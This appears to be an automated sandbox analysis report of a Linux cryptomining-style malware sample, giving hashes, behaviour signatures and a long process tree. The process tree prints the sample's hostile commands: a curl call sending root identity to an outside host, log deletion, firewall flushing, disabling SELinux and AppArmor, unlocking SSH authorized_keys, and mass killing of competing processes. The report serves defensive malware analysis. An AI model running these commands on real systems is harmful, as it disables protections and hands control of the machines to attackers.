Analysis
-
max time kernel
149s -
max time network
141s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
-
submitted
19-04-2024 00:44
General
-
Target
f92072637a0d5eede9213405cca50f48_JaffaCakes118
-
Size
61KB
-
MD5
f92072637a0d5eede9213405cca50f48
-
SHA1
c326fafaf0b92a501e99286f7ceb4a0313f97eae
-
SHA256
e958305ce1aba8b1314c35d65ce711e9336d55e1b445560adc053c4446a32d60
-
SHA512
4d1ae93e239790a484785df89f662fa2b04accc89d79e6367ad7c84731b9b53badaa9afba4d0281dabcdc5d3a94c25f901b86e4dfaec1706cf63b5e8c4100afb
-
SSDEEP
1536:8F2cc2/ndOQvL0KKBoLdAkKFOmm5air0TIe:8F2ccQGoL2v47ccyIe
Score
7/10
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
-
Flushes firewall rules 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Disables AppArmor 52 IoCs
Disables AppArmor security module.
-
Disables SELinux 10 IoCs
Disables SELinux security module.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 64 IoCs
-
Write file to user bin folder 1 TTPs 1 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 51 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 7 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/f92072637a0d5eede9213405cca50f48_JaffaCakes118/tmp/f92072637a0d5eede9213405cca50f48_JaffaCakes1181⤵
- Writes DNS configuration
- Writes file to tmp directory
-
/usr/bin/idid2⤵
-
-
/usr/bin/curlcurl "http://oracle.zzhreceive.top/b2f628/idcheck/uid=0(root) gid=0(root) groups=0(root)"2⤵
-
-
/bin/mkdirmkdir /var/tmp/.system -p2⤵
-
-
/bin/rmrm -rf /var/log/syslog2⤵
-
-
/usr/bin/chattrchattr -iua /tmp/2⤵
-
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
-
/usr/bin/sudosudo sysctl "kernel.nmi_watchdog=0"2⤵
-
/sbin/sysctlsysctl "kernel.nmi_watchdog=0"3⤵
- Reads CPU attributes
-
-
-
/sbin/sysctlsysctl "kernel.nmi_watchdog=0"2⤵
-
-
/usr/bin/chattrchattr -iae /root/.ssh/2⤵
-
-
/usr/bin/chattrchattr -iae /root/.ssh/authorized_keys2⤵
-
-
/bin/rmrm -rf "/tmp/addres*"2⤵
-
-
/bin/rmrm -rf "/tmp/walle*"2⤵
-
-
/bin/rmrm -rf /tmp/keys2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep -i "[a]liyun"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep -i "[y]unjing"2⤵
-
-
/usr/sbin/setenforcesetenforce 02⤵
- Disables SELinux
-
-
/usr/sbin/serviceservice apparmor stop2⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket3⤵
- Attempts to change immutable files
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket3⤵
- Enumerates kernel/hardware configuration
-
-
-
/usr/local/sbin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
-
-
/sbin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
-
-
/bin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl disable apparmor2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl stop aliyun2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl disable aliyun.service2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/grepgrep 185.71.65.2382⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep 140.82.52.872⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :4432⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep :232⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep :4432⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :1432⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :22222⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep :33332⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep :33892⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep :55552⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep :66662⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :66652⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :66672⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :77772⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :84442⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :33472⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep :33332⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep :55552⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "kworker -c\\"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep log_2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep systemten2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep netns2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 103⤵
- Disables SELinux
-
-
/usr/local/bin/killkill -9 103⤵
- Disables SELinux
-
-
/usr/sbin/killkill -9 103⤵
- Disables SELinux
-
-
/usr/bin/killkill -9 103⤵
- Disables SELinux
-
-
/sbin/killkill -9 103⤵
- Disables SELinux
-
-
/bin/killkill -9 103⤵
- Disables SELinux
-
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep voltuned2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep darwin2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/dl2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep /tmp/ddg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep /tmp/pprt2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/ppol2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/65ccE*"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/jmx*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep "/tmp/2Ne80*"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep 45.76.122.922⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep 51.38.191.1782⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 51.15.56.1612⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 86s.jpg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep aGTSGJJp2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep I0r8Jyyt2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep AgdgACUD2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep uiZvwxG82⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep hahwNEdB2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep BtwXn5qH2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 3XEzey2T2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep t2tKrCSZ2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep svc2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep HD7fcBgg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep zXcDajSs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep 3lmigMo2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep AkMK4A22⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep AJ2AkKe2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep HiPxCJRS2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0302⤵
- Disables SELinux
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0312⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0322⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0332⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep C4iLM4L2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /boot/vmlinuz2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep i4b503a52cc52⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep nqscheduler2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep rkebbwgqpl4npmm2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep "]"2⤵
-
-
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep 0kwti6ut420t2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep -v /2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep -v _2⤵
-
-
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep "\\[^"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep rsync2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep watchd0g2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 158.69.133.18:82202⤵
- Disables SELinux
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep /tmp/java2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep gitee.com2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/java2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 104.248.4.1622⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 89.35.39.782⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /dev/shm/z3.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep kthrotlds2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep ksoftirqds2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep netdns2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep watchdogs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
